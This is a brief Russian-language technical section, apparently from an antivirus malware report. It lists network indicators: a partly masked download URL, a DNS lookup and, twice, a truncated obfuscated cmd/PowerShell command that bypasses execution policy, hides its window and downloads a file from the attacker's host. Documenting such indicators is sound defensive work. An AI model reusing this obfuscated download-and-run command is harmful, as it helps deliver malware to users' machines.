Техническая информация
- http://fo###repu.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^wE^R^ShE^L^L.exe -eXe^c^U^tion^P^OliCy ^b^Y^p^A^ss ^-^n^OpRofile -Wi^ND^OWSTy^lE ^HID^DE^N (NEW-Obj^e^CT ^sYste^M^.^N^e^T.w^eB^c^lIen^t).dOwN^LOa^d^FILe^('http://fo###repu....
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /c "PO^wE^R^ShE^L^L.exe -eXe^c^U^tion^P^OliCy ^b^Y^p^A^ss ^-^n^OpRofile -Wi^ND^OWSTy^lE ^HID^DE^N (NEW-Obj^e^CT ^sYste^M^.^N^e^T.w^eB^c^lIen^t).dOwN^LOa^d^FILe^('http://fo###repu....' (со скрытым окном)